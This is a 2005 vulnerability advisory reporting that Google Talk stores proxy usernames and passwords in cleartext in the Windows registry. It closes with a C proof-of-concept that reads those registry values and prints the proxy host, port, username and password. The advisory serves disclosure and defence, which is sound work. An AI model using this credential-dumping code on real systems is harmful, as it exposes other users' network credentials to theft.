Title: Google Talk cleartext proxy credentials vulnerability Risk: Low/Medium Versions affected:<= 1.0.0.72 Credits:pagvac (Adrian Pastor) Date found:12th Oct, 2005 Homepage:www.ikwt.com (In Knowledge We Trust) www.adrianpv.com E-mail:m123303 [ - a t - ] richmond.ac.uk [Background] Google Talk is a messenger client for Windows based on Jabber and can be downloaded from http://www.google.com/talk/ [Vulnerability Description] Google Talk seems to do a good job at storing the gmail login credentials in the Registry. These are the credentials needed to establish a connection to talk.google.com and are located under HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[username]@gmail.com\pw In this case the password seems to be encrypted (or at least obsfucated). It should also be noted that Google Talk stores the user settings under the correct hive (HKEY_CURRENT_USER rather than HKEY_LOCAL_MACHINE). That way only the currently logged user will have access to his/her Google Talk settings. *However*, the developers behind Google Talk seem to have forgotten to use any mechanism of encryption/obsfucation when it comes to saving the credentials for the proxy connection. In this case, all user credentials (username and password) are stored as *cleartext* (human readable) in the Windows Registry. Such credentials are located under HKEY_CURRENT_USER\Software\Google\Google Talk\Options\auth_user HKEY_CURRENT_USER\Software\Google\Google Talk\Options\auth_pass [Feasibility of exploitation] In order to exploit this vulnerability 3 requirements must be met: 1. The victim connects through a proxy when using Google Talk 2. Such proxy requires login credentials (username/password) 3. The attacker has compromised the account of the victim user (see PoC section for an example) [Solution] Do not use Google Talk behind a proxy which requires authentication or wait until vendor releases a patched version. [PoC] #include #include #include #define TITLE "\nGoogle Talk cleartext proxy credentials PoC exploit\n" /* Author:pagvac (Adrian Pastor) Date found:12th Oct, 2005 Filename:google-talk-dump-proxy-credentials.c Example of usage: C:\>runas /user:compromised-account cmd.exe Enter the password for compromised-account: [password entered] Attempting to start cmd.exe as user "target-host\compromised-account" ... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>e: E:\>cd "my exploits" E:\my exploits>google-talk-dump-proxy-credentials.exe Proxy credentials cleartext storage vulnerability - PoC exploit By pagvac (Adrian Pastor) www.ikwt.com (In Knowledge We Trust) Proxy host: 192.168.1.10 Port number: 8080 Username: compromised_username Password: compromised_password */ BOOL googleTalkIsInstalled(void) { HKEY hKey; LONG returnStatus; returnStatus = RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Google\\Google Talk", 0L, KEY_READ, &hKey); if (returnStatus == ERROR_SUCCESS) { RegCloseKey(hKey); return TRUE; } else { RegCloseKey(hKey); return FALSE; } } BOOL QueryStrVal(char lszVal2Query[255], char lszValData[255]) { char lszResult[255]; HKEY hKey; LONG returnStatus; DWORD dwType=REG_SZ; DWORD dwSize=255; returnStatus = RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Google\\Google Talk\\Options", 0L, KEY_READ, &hKey); if (returnStatus == ERROR_SUCCESS) { returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,(LPBYTE)&lszResult, &dwSize); if (returnStatus == ERROR_SUCCESS) { strcpy(lszValData, lszResult); RegCloseKey(hKey); return TRUE; } else { RegCloseKey(hKey); return FALSE; } } else { RegCloseKey(hKey); return FALSE; } } BOOL QueryDwordVal(char lszVal2Query[255], DWORD *dwVal) { DWORD dwResult; HKEY hKey; LONG returnStatus; DWORD dwType=REG_DWORD; DWORD dwSize=sizeof(DWORD); returnStatus = RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Google\\Google Talk\\Options", 0L, KEY_READ, &hKey); if (returnStatus == ERROR_SUCCESS) { returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,(LPBYTE)&dwResult, &dwSize); if (returnStatus == ERROR_SUCCESS) { *dwVal=dwResult; RegCloseKey(hKey); return TRUE; } else { RegCloseKey(hKey); return FALSE; } } else { RegCloseKey(hKey); return FALSE; } } int main(void) { char lszData[255]; DWORD dwData; printf(TITLE); printf("By pagvac (Adrian Pastor)\n"); printf("www.ikwt.com (In Knowledge We Trust)\n\n"); // Google Talk *is* installed if(googleTalkIsInstalled()) { // No proxy settings are present if(!QueryStrVal("proxy_host", lszData)) { printf("No proxy settings were found!\n"); printf("Probably Google Talk is connecting *directly* to the Internet...\n"); return 0; } // Proxy settings were configured else { printf("Proxy host:\t%s\n", lszData); // Print port number if(!QueryDwordVal("proxy_port", &dwData)) printf("Port number:\t%d\n", 1080); // by default port 1080 is used for proxy else printf("Port number:\t%d\n", dwData); // Print username if(!QueryStrVal("auth_user", lszData)) printf("(no username required)\n"); else { if(strlen(lszData)==0) printf("(no username required)\n"); else printf("Username:\t%s\n", lszData); } // Print password if(!QueryStrVal("auth_pass", lszData)) printf("(no password required)\n"); else { if(strlen(lszData)==0) printf("(no password required)\n"); else printf("Password:\t%s\n", lszData); } } } //Google Talk is *not* installed else { printf("Google Talk does *not* seem to be installed for the current user\n"); } return 0; }